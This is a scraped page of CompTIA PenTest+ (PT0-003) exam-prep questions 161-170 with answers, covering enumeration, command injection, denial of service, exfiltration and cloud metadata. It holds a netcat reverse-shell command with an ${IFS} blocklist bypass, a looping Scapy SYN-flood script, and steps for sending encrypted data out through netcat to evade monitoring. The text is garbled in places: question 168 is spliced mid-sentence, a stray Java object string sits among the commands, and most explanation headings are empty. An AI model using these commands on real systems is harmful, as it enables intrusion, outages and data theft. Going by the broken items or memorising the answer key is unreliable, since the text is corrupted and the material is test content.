CompTIA CompTIA Certifications PT0-003 Questions & Answers

• Question 161:

  A penetration tester gains access to a domain server and wants to enumerate the systems within the domain. Which of the following tools would provide the best oversight of domains?

  A. Netcat

  B. Wireshark

  C. Nmap

  D. Responder

  Correct Answer: C

  Installation:

  sudo apt-get install nmap

  Basic Network Scanning:

  nmap -sP 192.168.1.0/24

  Service and Version Detection:

  nmap -sV 192.168.1.10

  Enumerating Domain Systems:

  nmap -p 445 --script=smb-enum-domains 192.168.1.10 Advanced Scanning Options:

  nmap -sS 192.168.1.10

  uk.co.certification.simulator.questionpool.PList@1d40640d nmap -A 192.168.1.10

  Real-World Example:

  References from Pentesting Literature:

  References:

  Penetration Testing - A Hands-on Introduction to Hacking HTB Official Writeups

• Question 162:

  A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input:

  ip = IP("192.168.50.2")

  tcp = TCP(sport=RandShort(), dport=80, flags="S")

  raw = RAW(b"X"*1024)

  p = ip/tcp/raw

  send(p, loop=1, verbose=0)

  Which of the following attack types is most likely being used in the test?

  A. MDK4

  B. Smurf attack

  C. FragAttack

  D. SYN flood

  Correct Answer: D

  A SYN flood attack exploits the TCP handshake process by sending a large number of SYN packets to a target, consuming resources and causing a denial of service.

  Understanding the Script:

  Purpose of SYN Flood:

  Detection and Mitigation:

  References from Pentesting Literature:

  Step-by-Step ExplanationReferences:

  Penetration Testing - A Hands-on Introduction to Hacking HTB Official Writeups

• Question 163:

  A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:

  nc -e /bin/sh 10.10.10.16 4444

  Which of the following would most likely bypass the filtered space character?

  A. ${IFS}

  B. %0a

  C. + *

  D. %20

  Correct Answer: A

  To bypass a command injection blocklist that filters out the space character, the tester can use ${IFS}. ${IFS} stands for Internal Field Separator in Unix-like systems, which by default is set to space, tab, and newline characters.

  Command Injection:

  Bypassing Filters:

  Alternative Encodings:

  Pentest References:

  Command Injection: Understanding how command injection works and common techniques to exploit it.

  Bypassing Filters: Using creative methods like environment variable expansion to bypass input filters and execute commands.

  Shell Scripting: Knowledge of shell scripting and environment variables is crucial for effective exploitation.

  By using ${IFS}, the tester can bypass the filtered space character and execute the intended command, demonstrating the vulnerability's exploitability.

• Question 164:

  A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester's attacking hosts only. Which of the following would be most appropriate to avoid alerting the SOC?

  A. Apply UTF-8 to the data and send over a tunnel to TCP port 25.

  B. Apply Base64 to the data and send over a tunnel to TCP port 80.

  C. Apply 3DES to the data and send over a tunnel UDP port 53.

  D. Apply AES-256 to the data and send over a tunnel to TCP port 443.

  Correct Answer: D

  AES-256 (Advanced Encryption Standard with a 256-bit key) is a symmetric encryption algorithm widely used for securing data. Sending data over TCP port 443, which is typically used for HTTPS, helps to avoid detection by network

  monitoring systems as it blends with regular secure web traffic.

  Encrypting Data with AES-256:

  Step-by-Step Explanationopenssl enc -aes-256-cbc -salt -in plaintext.txt -out encrypted.bin -k secretkey

  Setting Up a Secure Tunnel:

  ssh -L 443:targetserver:443 user@intermediatehost Transferring Data Over the Tunnel:

  cat encrypted.bin | nc targetserver 443

  Benefits of Using AES-256 and Port 443:

  Real-World Example:

  References from Pentesting Literature:

  References:

  Penetration Testing - A Hands-on Introduction to Hacking HTB Official Writeups

• Question 165:

  A penetration tester executes multiple enumeration commands to find a path to escalate privileges. Given the following command:

  find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

  Which of the following is the penetration tester attempting to enumerate?

  A. Attack path mapping

  B. API keys

  C. Passwords

  D. Permission

  Correct Answer: D

  The command find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null is used to find files with the SUID bit set. SUID (Set User ID) permissions allow a file to be executed with the permissions of the file owner (root), rather than the

  permissions of the user running the file.

  Understanding the Command:

  Purpose:

  Why Enumerate Permissions:

  References from Pentesting Literature:

  Step-by-Step ExplanationReferences:

  Penetration Testing - A Hands-on Introduction to Hacking HTB Official Writeups

• Question 166:

  A penetration tester downloads a JAR file that is used in an organization's production environment. The tester evaluates the contents of the JAR file to identify potentially vulnerable components that can be targeted for exploit. Which of the following describes the tester's activities?

  A. SAST

  B. SBOM

  C. ICS

  D. SCA

  Correct Answer: D

  The tester's activity involves analyzing the contents of a JAR file to identify potentially vulnerable components. This process is known as Software Composition Analysis (SCA).

  Here's why:

  Understanding SCA:

  Comparison with Other Terms:

  The tester's activity of examining a JAR file for vulnerable components aligns with SCA, making it the correct answer.

• Question 167:

  A consultant starts a network penetration test. The consultant uses a laptop that is hardwired to the network to try to assess the network with the appropriate tools. Which of the following should the consultant engage first?

  A. Service discovery

  B. OS fingerprinting

  C. Host discovery

  D. DNS enumeration

  Correct Answer: C

  In network penetration testing, the initial steps involve gathering information to build an understanding of the network's structure, devices, and potential entry points. The process generally follows a structured approach, starting from broad

  discovery methods to more specific identification techniques. Here's a comprehensive breakdown of the steps:

  Host Discovery (Answer: C):

  nmap -sn 192.168.1.0/24

  References:

  Service Discovery (Option A):

  Objective: After identifying live hosts, determine the services running on them.

  Tools and Techniques:

  nmap -sV 192.168.1.100

  References:

  OS Fingerprinting (Option B):

  Objective: Determine the operating system of the identified hosts.

  Tools and Techniques:

  nmap -O 192.168.1.100

  References:

  DNS Enumeration (Option D):

  Objective: Identify DNS records and gather subdomains related to the target domain.

  Tools and Techniques:

  dnsenum example.com

  Conclusion: The initial engagement in a network penetration test is to identify the live hosts on the network (Host Discovery). This foundational step allows the penetration tester to map out active devices before delving into more specific

  enumeration tasks like service discovery, OS fingerprinting, and DNS enumeration. This structured approach ensures that the tester maximizes their understanding of the network environment efficiently and systematically.

• Question 168:

  A penetration tester runs a vulnerability scan that identifies several issues across numerous customer hosts. The executive report outlines the following information:

  Server High-severity vulnerabilities

  1.

  Development sandbox server 32

  2.

  Back office file transfer server 51

  3.

  Perimeter network web server 14

  4.

  Developer QA server 92

  The client is con ble monitoring mode using Aircrack-ng ch of the following hosts should the penetration tester select for additional manual testing?

  A. Server 1

  B. Server 2

  C. Server 3

  D. Server 4

  Correct Answer: C

  Client Concern:

  Server Analysis:

  Pentest References:

  By selecting Server 3 (the perimeter network web server) for additional manual testing, the penetration tester addresses the client's primary concern about the availability and security of the consumer-facing production application.

• Question 169:

  In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization. Through which of the following features could this information have been accessed?

  A. IAM

  B. Block storage

  C. Virtual private cloud

  D. Metadata services

  Correct Answer: D

  Metadata services in cloud environments provide information about the configuration and instance details, including sensitive data used during the initialization of virtual machines. Attackers can access this information to exploit and gain

  unauthorized access.

  Understanding Metadata Services:

  Common Information Exposed:

  Security Risks:

  Best Practices:

  References from Pentesting Literature:

  Step-by-Step ExplanationReferences:

  Penetration Testing - A Hands-on Introduction to Hacking HTB Official Writeups

• Question 170:

  Which of the following is a term used to describe a situation in which a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee?

  A. Badge cloning

  B. Shoulder surfing

  C. Tailgating

  D. Site survey

  Correct Answer: C

  Tailgating is the term used to describe a situation where a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee.

  Tailgating:

  Physical Security:

  Pentest References:

  By understanding and using tailgating, penetration testers can evaluate the effectiveness of an organization's physical security measures and identify potential vulnerabilities that could be exploited by malicious actors.